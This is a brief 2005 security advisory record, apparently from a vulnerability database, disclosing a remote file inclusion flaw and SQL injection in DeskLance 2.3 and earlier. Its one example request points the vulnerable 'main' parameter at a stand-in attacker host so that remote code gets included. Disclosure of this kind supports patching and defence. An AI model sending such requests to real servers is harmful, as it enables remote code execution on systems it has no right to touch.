DeskLance Vuln.

2005-11-24T00:00:00
ID SECURITYVULNS:DOC:10348
Type securityvulns
Reporter Securityvulns
Modified 2005-11-24T00:00:00

Description

DeskLance Vuln. Vuln. dicovered by : r0t Date: 24 nov. 2005 Orginal advsiory:http://pridels.blogspot.com/2005/11/desklance-vuln.html Vendor:http://www.desklance.com/ affected version: 2.3 and prior

Vuln. description: Input passed to the "main" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources. example: /support/index.php?main=http://attackerhost/file

aslo "announce" variable isn't properly sanitised before being used in a SQL query.It gives it gives to attacker full path and can be exploited by injecting arbitrary SQL code

Solution: Edit the source code to ensure that input is properly sanitised.